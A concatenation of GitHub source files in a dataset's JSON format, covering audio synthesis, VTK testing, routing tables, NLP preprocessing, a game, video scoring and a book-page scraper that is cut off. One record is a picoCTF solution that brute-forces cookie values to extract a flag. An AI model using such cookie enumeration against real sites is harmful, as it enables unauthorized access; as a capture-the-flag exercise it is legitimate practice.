substreams[event.note].events = (event,)\n else:\n # New voice\n substream = make_event_substream()\n substream.events = (event,)\n substreams[event.note] = substream\n voices.append(iter(monophonic_instrument(substream, **kwargs)))\n elif event.type == 'note_off':\n if event.note in substreams:\n if persist_internal:\n substreams[event.note].events = (event,)\n else:\n substreams[event.note].last_event = event\n del substreams[event.note]\n\n for i in range(len(voices) - 1, -1, -1):\n try:\n sample = next(voices[i])\n acc += sample\n except StopIteration:\n del voices[i]\n yield acc\n while voices:\n acc = 0\n for i in range(len(voices) - 1, -1, -1):\n try:\n sample = next(voices[i])\n acc += sample\n except StopIteration:\n del voices[i]\n yield acc\n return polyphonic_instrument\n\n# Handy decorator version\ndef poly(monophonic_instrument=None, persist_internal=False):\n if monophonic_instrument is None:\n return lambda mi: make_poly(mi, persist_internal)\n return make_poly(monophonic_instrument, persist_internal)\n\npoly_instrument = poly(mono_instrument)\n\n# Convert stream of MIDI events into stream of 
notes (currently just dictionaries).\n@stream\ndef events_to_notes(event_stream, rate=None):\n if rate is None:\n rate = SAMPLE_RATE\n t = 0\n ongoing = {}\n for messages in event_stream:\n for message in messages:\n if message.type not in ('note_on', 'note_off'):\n continue\n pitch = int(message.note)\n if message.type == 'note_on' and pitch not in ongoing:\n ongoing[pitch] = (t, message.velocity)\n elif message.type == 'note_off' and pitch in ongoing:\n start, velocity = ongoing[pitch]\n yield {\"start\": start, \"end\": t, \"pitch\": pitch, \"velocity\": velocity}\n del ongoing[pitch]\n t += 1/rate\n\ndef sampler(mapping, fade=0.01):\n \"Instrument that maps MIDI pitches to streams. Resamples to account for octave jumps.\"\n def get_sample(pitch, velocity):\n gain = velocity / 127\n if pitch in mapping:\n return mapping[pitch] * gain\n # No such pitch in the mapping; see if there's one in the same pitch class (offset by octaves).\n for m, s in mapping.items():\n if (pitch - m) % 12 == 0:\n return s.resample(2**((pitch - m)/12)) * gain\n\n @poly\n @stream\n def instrument(stream):\n it = iter([])\n for events in stream:\n if events:\n if events[-1].type == 'note_on':\n it = iter(get_sample(events[-1].note, events[-1].velocity) * ramp(0, 1, fade, True))\n elif events[-1].type == 'note_off':\n yield from ramp(1, 0, fade) * it\n return\n try:\n yield next(it)\n except StopIteration:\n return\n yield from it\n return instrument\n\n\n@stream\ndef soundfont(event_stream, preset=0, chunk_size=1024, path=\"/usr/share/sounds/sf2/default-GM.sf2\"):\n try:\n import fluidsynth\n except ImportError as exc:\n raise ImportError(f\"Missing optional dependency '{exc.name}'. Install via `python -m pip install {exc.name}`.\")\n\n # NOTE: Currently, this sets up the synth when the stream starts.\n # This might(?) 
be slow, especially for short cycled streams, but it guarantees fresh synth state upon replay.\n # (If you don't want a fresh synth state, cycle `event_stream` rather than this stream.)\n fs = fluidsynth.Synth()\n sfid = fs.sfload(path)\n fs.program_select(0, sfid, 0, preset)\n\n for chunk in event_stream.chunk(chunk_size):\n for events in chunk:\n for event in events:\n channel = getattr(event, \"channel\", 0)\n if event.type == 'note_on':\n fs.noteon(channel, int(event.note), event.velocity)\n elif event.type == 'note_off':\n fs.noteoff(channel, int(event.note))\n elif event.type == 'control_change':\n fs.cc(channel, event.control, event.value)\n elif event.type == 'program_change':\n fs.program_change(channel, event.program)\n yield from map(frame, fs.get_samples(chunk_size).reshape((-1, 2)) / (2**15-1))\n\n fs.delete()\n","repo_name":"ijc8/aleatora","sub_path":"src/aleatora/midi.py","file_name":"midi.py","file_ext":"py","file_size_in_byte":10194,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"9043916409","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\nmath = vtk.vtkMath()\nmath.RandomSeed(22)\n\nsphere = vtk.vtkSphereSource()\nsphere.SetPhiResolution(32)\nsphere.SetThetaResolution(32)\n\nextract = vtk.vtkExtractPolyDataPiece()\nextract.SetInputConnection(sphere.GetOutputPort())\n\nnormals = vtk.vtkPolyDataNormals()\nnormals.SetInputConnection(extract.GetOutputPort())\n\nps = vtk.vtkPieceScalars()\nps.SetInputConnection(normals.GetOutputPort())\n\nmapper = vtk.vtkPolyDataMapper()\nmapper.SetInputConnection(ps.GetOutputPort())\nmapper.SetNumberOfPieces(2)\n\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\n\nsphere2 = vtk.vtkSphereSource()\nsphere2.SetPhiResolution(32)\nsphere2.SetThetaResolution(32)\n\nextract2 = vtk.vtkExtractPolyDataPiece()\nextract2.SetInputConnection(sphere2.GetOutputPort())\n\nmapper2 = vtk.vtkPolyDataMapper()\nmapper2.SetInputConnection(extract2.GetOutputPort())\nmapper2.SetNumberOfPieces(2)\nmapper2.SetPiece(1)\nmapper2.SetScalarRange(0, 4)\nmapper2.SetScalarModeToUseCellFieldData()\nmapper2.SetColorModeToMapScalars()\nmapper2.ColorByArrayComponent(vtk.vtkDataSetAttributes.GhostArrayName(), 0)\nmapper2.SetGhostLevel(4)\n\n# check the pipeline size\nextract2.UpdateInformation()\npsize = vtk.vtkPipelineSize()\nif (psize.GetEstimatedSize(extract2, 0, 0) > 100):\n print (\"ERROR: Pipeline Size increased\")\n pass\nif (psize.GetNumberOfSubPieces(10, mapper2) != 1):\n print (\"ERROR: Number of sub pieces changed\",\n psize.GetNumberOfSubPieces(10, mapper2))\n pass\n\nactor2 = vtk.vtkActor()\nactor2.SetMapper(mapper2)\nactor2.SetPosition(1.5, 0, 0)\n\nsphere3 = vtk.vtkSphereSource()\nsphere3.SetPhiResolution(32)\nsphere3.SetThetaResolution(32)\n\nextract3 = vtk.vtkExtractPolyDataPiece()\nextract3.SetInputConnection(sphere3.GetOutputPort())\n\nps3 = vtk.vtkPieceScalars()\nps3.SetInputConnection(extract3.GetOutputPort())\n\nmapper3 = vtk.vtkPolyDataMapper()\nmapper3.SetInputConnection(ps3.GetOutputPort())\nmapper3.SetNumberOfSubPieces(8)\nmapper3.SetScalarRange(0, 8)\n\nactor3 = vtk.vtkActor()\nactor3.SetMapper(mapper3)\nactor3.SetPosition(0, -1.5, 0)\n\nsphere4 = vtk.vtkSphereSource()\nsphere4.SetPhiResolution(32)\nsphere4.SetThetaResolution(32)\n\nextract4 = vtk.vtkExtractPolyDataPiece()\nextract4.SetInputConnection(sphere4.GetOutputPort())\n\nps4 = 
vtk.vtkPieceScalars()\nps4.RandomModeOn()\nps4.SetScalarModeToCellData()\nps4.SetInputConnection(extract4.GetOutputPort())\n\nmapper4 = vtk.vtkPolyDataMapper()\nmapper4.SetInputConnection(ps4.GetOutputPort())\nmapper4.SetNumberOfSubPieces(8)\nmapper4.SetScalarRange(0, 8)\n\nactor4 = vtk.vtkActor()\nactor4.SetMapper(mapper4)\nactor4.SetPosition(1.5, -1.5, 0)\n\nren = vtk.vtkRenderer()\nren.AddActor(actor)\nren.AddActor(actor2)\nren.AddActor(actor3)\nren.AddActor(actor4)\n\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\n\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\niren.Initialize()\n#iren.Start()\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Parallel/Core/Testing/Python/TestPolyDataPieces.py","file_name":"TestPolyDataPieces.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"10623675310","text":"import subprocess\nimport sys\nimport ujson\n\nif __name__ == '__main__':\n result = []\n fieldnames=[]\n if '-n' in sys.argv:\n resolv = 'n'\n else:\n resolv = ''\n sp = subprocess.run(['/usr/bin/netstat', '-rW' + resolv], capture_output=True, text=True)\n current_proto = \"\"\n for line in sp.stdout.split(\"\\n\"):\n fields = line.split()\n if len(fields) == 0:\n continue\n elif len(fields) == 1 and fields[0] == 'Internet:':\n current_proto = 'ipv4'\n elif len(fields) == 1 and fields[0] == 'Internet6:':\n current_proto = 'ipv6'\n elif len(fields) > 2 and fields[0] == 'Destination' and fields[1] == 'Gateway':\n fieldnames = list(map(lambda x : x.lower(), fields))\n elif len(fields) > 2:\n record = {'proto': current_proto}\n for fieldid in range(len(fields)):\n if len(fieldnames) > fieldid:\n record[fieldnames[fieldid]] = fields[fieldid]\n # space out missing fields\n for fieldname in fieldnames:\n if fieldname not in record:\n record[fieldname] = \"\"\n result.append(record)\n\n # handle command line argument (type selection)\n if len(sys.argv) > 1 and 'json' in sys.argv:\n print(ujson.dumps(result))\n else:\n # output plain\n print ('\\t\\t'.join(fieldnames))\n frmt = \"%(proto)s\\t\"\n for fieldname in fieldnames:\n frmt = frmt + \"%(\"+fieldname+\")s\\t\"\n for record in result:\n print (frmt%record)\n","repo_name":"opnsense/core","sub_path":"src/opnsense/scripts/routes/show_routes.py","file_name":"show_routes.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":2702,"dataset":"github-code","pt":"72"} +{"seq_id":"28196772989","text":"import re\nimport requests\n\nurl = \"http://mercury.picoctf.net:21485/check\"\n\n\nfor i in range(50):\n cookies = {\n \"name\": str(i)\n }\n response = requests.get(url, cookies=cookies)\n\n if \"Not very special\" not in response.text:\n flag = re.findall(\"picoCTF{.*}\", response.text)[0]\n print(flag)\n exit(0)\n","repo_name":"CavemanJay/PicoCTF","sub_path":"practice/cookies_COMPLETE/get_flag.py","file_name":"get_flag.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10168833964","text":"from typing import Optional, Union\n\nimport torch\nfrom transformers.tokenization_utils_base import PreTrainedTokenizerBase\nfrom transformers.utils import PaddingStrategy\n\n\nclass CombinedDataCollator:\n def __init__(\n self,\n tokenizer: PreTrainedTokenizerBase,\n padding: Union[bool, str, PaddingStrategy] = True,\n max_length: Optional[int] = 
None,\n ):\n self.tokenizer = tokenizer\n self.padding = padding\n self.max_length = max_length\n\n def __call__(self, features):\n\n sent_label = tuple(feature.pop(\"sent_label\") for feature in features)\n\n # Conversion to tensors will fail if we have labels\n # as they are not of the same length yet.\n batch = self.tokenizer.pad(\n features,\n padding=self.padding,\n max_length=self.max_length,\n )\n\n labels = tuple(tuple(feature[\"labels\"]) for feature in features)\n\n sequence_length = len(batch[\"input_ids\"][0])\n\n paddings = tuple((-100,) * (sequence_length - len(label)) for label in labels)\n\n batch[\"labels\"] = (\n [label + padding for label, padding in zip(labels, paddings)]\n if self.tokenizer.padding_side == \"right\"\n else [padding + label for label, padding in zip(labels, paddings)]\n )\n\n batch[\"sent_label\"] = sent_label\n\n # Convert to tensor now\n batch = {k: torch.as_tensor(v, dtype=torch.int64) for k, v in batch.items()}\n\n return batch\n","repo_name":"naamiinepal/IPV-detection","sub_path":"lightning_modules/datamodules/combined_data_collator.py","file_name":"combined_data_collator.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24202448298","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sponsors', '0004_auto_20150726_1412'),\n ('core', '0005_auto_20150726_1416'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='HomePageSponsorRelationship',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('homepage', models.ForeignKey(to='core.HomePage')),\n ('level', models.ForeignKey(to='sponsors.SponsorshipLevel')),\n ('sponsor', models.ForeignKey(to='sponsors.Sponsor')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"gitdaniel228/website","sub_path":"pythonie/core/migrations/0006_homepagesponsorrelationship.py","file_name":"0006_homepagesponsorrelationship.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20925205336","text":"import numpy as np\nimport pandas as pd\nimport jieba\nimport re\nimport random\nfrom config import *\nfrom collections import Counter\nfrom multicore import parallelize\nfrom file_utils import save_dict\nfrom gensim.models.word2vec import LineSentence\nfrom gensim.models import word2vec\nimport gensim\n\nimport logging\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n######################################################################################################\n### Part 0. 
Utility functions for loading processed data \n######################################################################################################\ndef load_train_dataset(max_enc_len, max_dec_len):\n \"\"\"\n :return: load processed training data\n \"\"\"\n train_X = np.load(train_x_path + '.npy')\n train_Y = np.load(train_label_path + '.npy')\n\n train_X = train_X[:, :max_enc_len]\n train_Y = train_Y[:, :max_dec_len]\n return train_X, train_Y\n\n\ndef load_test_dataset(max_enc_len=200):\n \"\"\"\n :return: load processed test data\n \"\"\"\n test_X = np.load(test_x_path + '.npy')\n test_X = test_X[:, :max_enc_len]\n return test_X\n\n######################################################################################################\n### Part I. Utility functions for preprocessing data \n######################################################################################################\ndef load_data(train_data_path, test_data_path):\n train_data = pd.read_csv(train_data_path, encoding='utf-8')\n test_data = pd.read_csv(test_data_path, encoding='utf-8')\n\n print('train data size {},test data size {}'.format(len(train_data), len(test_data)))\n\n train_data.dropna(subset = ['Report'], inplace = True)\n\n train_data.fillna('', inplace = True)\n test_data.fillna('', inplace = True)\n\n return train_data.iloc[:30,:], test_data.iloc[:30, :]\n\n\ndef clean_data(sentence):\n if isinstance(sentence, str):\n return re.sub(\n r'[\\s+\\-\\|\\!\\/\\[\\]\\{\\}_,$%^*(+\\\"\\')]+|[::+——()?【】~@#¥%……&*()]+|车主说|技师说|语音|图片',\n '', sentence)\n else:\n return ''\n\n\ndef tokenize(sentence):\n stopwords = load_stopwords(stopwords_path)\n return ' '.join([word for word in jieba.lcut(sentence) if word not in stopwords])\n\n\ndef process_sentence(sentence):\n sentence = clean_data(sentence)\n\n sentence = tokenize(sentence)\n return sentence\n\n\ndef dataframe_process(data):\n \n for column in ['Question', 'Dialogue']:\n data[column] = data[column].apply(process_sentence)\n \n if 'Report' in data.columns:\n data['Report'] = data['Report'].apply(process_sentence)\n \n return data\n\ndef load_stopwords(stopwords_path):\n with open(stopwords_path, 'r') as file:\n lines = file.readlines()\n \n stopwords = [line.strip() for line in lines]\n return stopwords\n
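\n\n# Example of the cleaning pipeline (hypothetical input, added as an\n# illustration): process_sentence('技师说:发动机有异响') strips the dialogue\n# markers and punctuation, segments with jieba, and returns space-joined\n# tokens such as '发动机 异响' (exact output depends on the stopword list).\n\n\n######################################################################################################\n### Part II. 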
Utility functions for building word embeddings\n######################################################################################################\ndef vocab_index_dict(merged_data):\n '''\n generate vocab-index pair\n merged_data: string with words separated by ' '\n '''\n word_list = merged_data.split()\n word_counts = Counter(word_list)\n vocab_list = sorted(word_counts.items(), key = lambda x: x[1], reverse = True)\n vocab_list = [(vocab_list[i][0], i+1) for i in range(len(vocab_list))]\n\n vocab_to_index = dict(vocab_list)\n\n index_word_list = [(item[1], item[0]) for item in vocab_list]\n index_to_vocab = dict(index_word_list)\n return vocab_to_index, index_to_vocab\n\ndef train_w2v_embeddings(data_path, model_path):\n model = word2vec.Word2Vec(LineSentence(data_path), workers=8, min_count=5, size=200)\n model.save(model_path)\n return model\n\n\ndef build_embedding_matrix(model):\n '''\n using word2vec index2word list, which is a list of string(word)\n '''\n embedding_dim = model.wv.vector_size\n vocab_size = len(model.wv.vocab)\n \n embedding_matrix = np.zeros((vocab_size, embedding_dim))\n for i in range(vocab_size):\n embedding_matrix[i, :] = model.wv[model.wv.index2word[i]]\n embedding_matrix = embedding_matrix.astype('float32')\n \n np.savetxt(save_embedding_matrix_path, embedding_matrix, fmt='%0.8f')\n print('embedding matrix extracted')\n return embedding_matrix\n\ndef build_embedding_matrix_direct(model):\n '''\n get embedding matrix directly from the model\n '''\n return model.wv.vectors\n\ndef get_max_len(sentences):\n '''\n sentences: Series object\n '''\n lens = sentences.str.count(' ')+1\n # int() so the result can be used as a slice bound / pad count\n return int(lens.mean() + 2 * lens.std())\n\ndef pad_sentence(x, x_max_len, vocab):\n '''\n fill in <START>/<STOP>/<PAD>/<UNK> markers\n (the angle-bracket token names are reconstructed; the original markers\n were stripped from this copy of the source)\n '''\n tokens = [token if token in vocab else '<UNK>' for token in x.strip().split()]\n tokens = tokens[: x_max_len]\n\n padded_tokens = ['<START>'] + tokens + ['<STOP>']\n padded_sentence = padded_tokens + ['<PAD>'] * (x_max_len - len(tokens))\n return ' '.join(padded_sentence)\n\n\ndef transform(sentence, vocab_to_index):\n '''\n re-represent the sentence using token indices\n '''\n tokens = sentence.strip().split()\n return [vocab_to_index[token] if token in vocab_to_index.keys() else vocab_to_index['<UNK>'] for token in tokens]\n\n\ndef build_dataset(train_data_path, test_data_path):\n\n # 1. load data\n train_data, test_data = load_data(train_data_path, test_data_path)\n\n jieba.load_userdict(user_dict)\n\n # 2. parallelize\n train_data = parallelize(train_data, dataframe_process)\n test_data = parallelize(test_data, dataframe_process)\n \n # 3. save train/test data\n train_data.to_csv(processed_train_data_path, index = None, header = True)\n test_data.to_csv(processed_test_data_path, index = None, header = True)\n\n\n # 4. save merged data\n train_data['merged'] = train_data[['Question', 'Dialogue', 'Report']].apply(lambda x: ' '.join(x), axis = 1)\n test_data['merged'] = test_data[['Question', 'Dialogue']].apply(lambda x: ' '.join(x), axis = 1)\n merged_data = pd.concat([train_data['merged'], test_data['merged']], axis = 0)\n print('train data size {},test data size {},merged_df data size {}'.format(len(train_data),\n len(test_data),\n len(merged_data)))\n\n merged_data.to_csv(merged_data_path, index = None, header = True)\n\n # home-made vocab_index_dict\n # vocab_to_index, index_to_vocab = vocab_index_dict(merged_data)\n
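\n # Illustrative example (hypothetical tokens and ids, added for clarity):\n #   pad_sentence('方向盘 抖动', 4, vocab)\n #     -> '<START> 方向盘 抖动 <STOP> <PAD> <PAD>'\n #   transform('<START> 方向盘 抖动 <STOP> <PAD> <PAD>', vocab_to_index)\n #     -> e.g. [2, 381, 907, 3, 0, 0] (ids depend on the trained vocab)\n\n # 5. 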
train model and build embedding matrix\n # NOTE: gensim builds the vocab list in descending order of frequency\n model = train_w2v_embeddings(merged_data_path, word2vec_model_path)\n embedding_matrix = build_embedding_matrix_direct(model)\n print('embedding matrix shape: {}'.format(embedding_matrix.shape))\n\n index_to_vocab = {index:word for index, word in enumerate(model.wv.index2word)}\n vocab_to_index = {word:index for index, word in enumerate(model.wv.index2word)}\n\n # 6. separate input data and labels\n train_data['X'] = train_data[['Question', 'Dialogue']].apply(lambda x: ' '.join(x), axis = 1)\n test_data['X'] = test_data[['Question', 'Dialogue']].apply(lambda x: ' '.join(x), axis = 1)\n\n # 7. padding \n # input sentences processing\n vocab = model.wv.vocab\n train_x_max_len = get_max_len(train_data['X'])\n test_x_max_len = get_max_len(test_data['X'])\n x_max_len = max(train_x_max_len, test_x_max_len)\n train_data['X'] = train_data['X'].apply(lambda x: pad_sentence(x, x_max_len, vocab))\n test_data['X'] = test_data['X'].apply(lambda x: pad_sentence(x, x_max_len, vocab))\n\n # label sentences (report) processing\n train_label_max_len = get_max_len(train_data['Report'])\n train_data['Y'] = train_data['Report'].apply(lambda x: pad_sentence(x, train_label_max_len, vocab))\n\n\n # 8. save padded data for word2vec model retraining\n train_data['X'].to_csv(train_x_pad_path, index=None, header=False)\n train_data['Y'].to_csv(train_label_pad_path, index=None, header=False)\n test_data['X'].to_csv(test_x_pad_path, index=None, header=False)\n\n # 9. retrain\n print('start retraining word2vec model...')\n model.build_vocab(LineSentence(train_x_pad_path), update = True)\n model.train(LineSentence(train_x_pad_path), epochs = 1, total_examples = model.corpus_count)\n print('progressing 1/3.')\n\n model.build_vocab(LineSentence(test_x_pad_path), update = True)\n model.train(LineSentence(test_x_pad_path), epochs = 1, total_examples = model.corpus_count)\n print('progressing 2/3.')\n\n model.build_vocab(LineSentence(train_label_pad_path), update = True)\n model.train(LineSentence(train_label_pad_path), epochs = 1, total_examples = model.corpus_count)\n print('finish retraining.')\n\n # 10. update vocab_to_index and index_to_vocab\n vocab_to_index = {token: index for index, token in enumerate(model.wv.index2word)}\n index_to_vocab = {index: token for index, token in enumerate(model.wv.index2word)}\n\n # 11. save results\n model.save(word2vec_model_path)\n print('final word2vec model has a vocabulary of size ', len(model.wv.vocab))\n\n save_dict(vocab_to_index, vocab_to_index_path)\n save_dict(index_to_vocab, index_to_vocab_path)\n\n embedding_matrix = model.wv.vectors\n np.save(embedding_matrix_path, embedding_matrix)\n
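\n # (Steps 9-11 retrain word2vec on the padded corpora so the special\n # tokens introduced by padding get vocabulary entries and embedding\n # vectors -- my reading of the intent, not stated in the original.)\n\n # 12. 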
transform sentence to index sequence\n train_x_index_seq = train_data['X'].apply(lambda x: transform(x, vocab_to_index))\n test_x_index_seq = test_data['X'].apply(lambda x: transform(x, vocab_to_index))\n\n train_label_index_seq = train_data['Y'].apply(lambda x: transform(x, vocab_to_index))\n\n # save results\n np.save(train_x_path, train_x_index_seq)\n np.save(test_x_path, test_x_index_seq)\n np.save(train_label_path, train_label_index_seq)\n\n return train_x_index_seq, train_label_index_seq, test_x_index_seq\n\n\n\n\nif __name__ == '__main__':\n build_dataset(train_data_path, test_data_path)","repo_name":"rachelduan/AbstractGeneration","sub_path":"utils/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":10210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26288734466","text":"import pygame\nfrom pygame.sprite import Group\n\nimport game_functions as gf\n\nfrom settings import Settings\nfrom ship import Ship\n\n\ndef run_game():\n # Initialize the game and create a screen object\n pygame.init()\n ai_settings = Settings()\n screen = pygame.display.set_mode((ai_settings.screen_width, ai_settings.screen_height))\n pygame.display.set_caption(\"外星人入侵\")\n\n ship = Ship(ai_settings, screen)\n bullets = Group()\n\n while True:\n gf.check_events(ship, ai_settings, screen, bullets)\n ship.update()\n bullets.update()\n\n # Remove bullets that have disappeared off-screen\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n gf.update_screen(ai_settings, screen, ship, bullets)\n\n\nrun_game()\n","repo_name":"Gzzccc/pygame-alien","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7002900336","text":"import os\nimport cv2\nimport xlsxwriter\n\nfrom ImgPredictor import ImgPredictor\nfrom root_dir import DATA_DIR\nfrom utils.vpa_utils import avg_list\nfrom utils.project_utils import *\n\n\nclass VideoPredictor(object):\n\n def __init__(self):\n pass\n\n def init_vid(self, vid_path):\n \"\"\"\n Initialize the video capture\n \"\"\"\n cap = cv2.VideoCapture(vid_path)\n n_frame = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n fps = int(cap.get(cv2.CAP_PROP_FPS)) # 26\n\n w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n print('[Info] 视频尺寸: {}'.format((h, w)))\n return cap, n_frame, fps, (w, h)\n\n def predict_video(self, vid_path):\n vid_name = vid_path.split('/')[-1]\n print('[Info] 视频路径: {}, 名称: {}'.format(vid_path, vid_name))\n cap, n_frame, fps, (w, h) = self.init_vid(vid_path)\n\n print('[Info] 视频帧数: {}'.format(n_frame))\n ip = ImgPredictor()\n\n gap = n_frame // 50 # sample ~50 evenly spaced frames\n\n s_tech_list, s_aest_list = [], []\n for i in range(0, n_frame, gap):\n cap.set(cv2.CAP_PROP_POS_FRAMES, i)\n ret, frame = cap.read()\n\n s_tech, s_aest = ip.predict_img_op(frame)\n s_tech_list.append(s_tech)\n s_aest_list.append(s_aest)\n\n # print('[Info] 视频 质量: {}, 美学: {}'.format(s_tech, s_aest))\n\n avg_tech = avg_list(s_tech_list)\n avg_aest = avg_list(s_aest_list)\n\n print('[Info] 均值 质量: {}, 美学: {}'.format(avg_tech, avg_aest))\n\n return vid_name, avg_tech, avg_aest\n\n\ndef video_predictor_test():\n v_path = os.path.join(DATA_DIR, 'videos', '9c59e6b073.mp4')\n vp = VideoPredictor()\n vp.predict_video(v_path)\n\n\ndef video_dir_test():\n vid_p_dir = os.path.join(DATA_DIR, 'videos', 'positive')\n vid_n_dir = os.path.join(DATA_DIR, 'videos', 'negative')\n
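 # Flow below (summary added for orientation): score every clip in the\n # positive/negative folders, then write one row per video (name, quality\n # score, aesthetics score) into an xlsx report via xlsxwriter.\n paths_p_list, names_p_list = 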
traverse_dir_files(vid_p_dir)\n paths_n_list, names_n_list = traverse_dir_files(vid_n_dir)\n\n names_list = names_p_list + names_n_list\n paths_list = paths_p_list + paths_n_list\n\n vp = VideoPredictor()\n\n out_dir = os.path.join(DATA_DIR, 'outs')\n mkdir_if_not_exist(out_dir)\n out_excel_file = os.path.join(out_dir, 'res.xlsx')\n # create_file(out_excel_file)\n\n # add_sheet is used to create sheet.\n workbook = xlsxwriter.Workbook(out_excel_file)\n worksheet = workbook.add_worksheet()\n\n row = 0\n\n print('[Info] 视频总数: {}'.format(len(names_list)))\n worksheet.write(row, 0, u'视频名称')\n worksheet.write(row, 1, u'质量评分')\n worksheet.write(row, 2, u'美学评分')\n row += 1\n\n vid_list, tech_list, aest_list = [], [], []\n for name, path in zip(names_list, paths_list):\n try:\n vid_name, avg_tech, avg_aest = vp.predict_video(path)\n print('[Info] 视频: {}, 质量: {}, 美学: {}'.format(vid_name, avg_tech, avg_aest))\n vid_list.append(vid_name)\n tech_list.append(avg_tech)\n aest_list.append(avg_aest)\n\n worksheet.write(row, 0, vid_name)\n worksheet.write(row, 1, avg_tech)\n worksheet.write(row, 2, avg_aest)\n row += 1\n # data_line = vid_name + \",\" + str(avg_tech) + \",\" + str(avg_aest)\n # write_line(out_json_file, data_line)\n except Exception as e:\n print(e)\n print('[Info] 错误视频: {}'.format(name))\n\n workbook.close()\n\n\ndef main():\n # video_predictor_test()\n video_dir_test()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SpikeKing/vqa","sub_path":"VideoPredictor.py","file_name":"VideoPredictor.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6930184348","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom PIL import Image\nfrom os import makedirs, listdir\nfrom os.path import isfile, join, exists, splitext\nimport fire\n\nCHROMEDRIVER_PATH = '/path/to/chromedriver'\nSAVE_PATH = '/path/to/where/you/want/to/save'\n# can't go directly to the SSO login page. Need to be redirected.\nSSO_INTRO_URL = 'https://bobcat.library.nyu.edu/primo-explore/search?query=any,contains,Art%20of%20the%20Past:%20Sources%20and%20Reconstruction:%20Proceedings%20of%20the%20First%20Symposium%20of%20the%20Art%20Technological%20Source%20Research%20Study%20Group&tab=all&search_scope=all&sortby=rank&vid=NYU&lang=en_US&mode=basic'\n\ndef check_for_auth():\n user_input = input('Press any key to continue, once logged in using the new chromedriver window.')\n\ndef check_for_completeness():\n user_input = input('Press any key to continue, once verified that all the pages successfully downloaded.')\n\ndef check_for_yes():\n user_input = input('Did that work? You can check and see if the chromedriver window successfully loaded any pages, and/or new files were saved to the book folder. If it did type \"yes\". 
Anything other than that will rerun the last step.')\n    return user_input == 'yes'\n\ndef run(book_id, start, end):\n    driver = auth()\n    check_for_auth()\n\n    try:\n        driver = retrieve(driver, book_id, start, end)\n    except:\n        print('hit an error')\n\n    # rerun until the user confirms it worked (it's flaky)\n    while not check_for_yes():\n        try:\n            driver = retrieve(driver, book_id, start, end)\n        except:\n            print('hit an error')\n\n    check_for_completeness()\n\n    combine(book_id)\n    quit(driver)\n\n\ndef auth():\n    print('Opening chromedriver to authenticate with SSO')\n    driver = webdriver.Chrome(executable_path=CHROMEDRIVER_PATH)\n    driver.get(SSO_INTRO_URL)\n    wait = WebDriverWait(driver, 10)\n    return driver\n\n\ndef retrieve(driver, book_id, start, end):\n    \"\"\"Function that retrieves page-by-page png files for a book id.\"\"\"\n    # book_id = 'mdp.39015025096234' # (an example)\n    print('Retrieving pages {0} - {1} for doc {2}'.format(start, end, book_id))\n\n    directory = join(SAVE_PATH, '{0}'.format(book_id))\n    if not exists(directory):\n        makedirs(directory)\n\n    for page_num in range(int(start),int(end) + 1):\n        page_url = 'https://babel.hathitrust.org/cgi/imgsrv/image?id={0};seq={1};size=250;rotation=0'.format(book_id, page_num)\n        driver.get(page_url)\n        wait = WebDriverWait(driver, 8)\n\n        full_path = join(directory, 'page_{0}.png'.format(page_num))\n\n        page_img = driver.find_element_by_tag_name('img')\n        _save_image(driver, page_img, full_path)\n        print('\\tRetrieved page {0} ({1})'.format(page_num, full_path))\n\n    return driver\n\n\ndef combine(book_id):\n    print('Combining pages...')\n    path = join(SAVE_PATH, '{0}'.format(book_id))\n    files = [f for f in listdir(path) if isfile(join(path, f))]\n    sorted_files = sorted(files,key=lambda x: int(splitext(x)[0].split(\"_\")[1])) \n\n    # handle first image separately, then append others\n    pil_image1 = Image.open(join(path,sorted_files[0])) \n    converted1 = pil_image1.convert('RGB')\n\n    converted_img_list = []\n    for img in sorted_files[1:]:\n        pil_image = Image.open(join(path,img)) \n        converted = pil_image.convert('RGB')\n        converted_img_list.append(converted) \n\n    outfile_name = join(path, '{0}.pdf'.format(book_id))\n    converted1.save(outfile_name, save_all=True, append_images=converted_img_list)\n\ndef quit(driver):\n    print('Quitting session')\n    driver.quit()\n\n#################################\n############ HELPERS ############\n#################################\ndef _save_image(chrome, element, 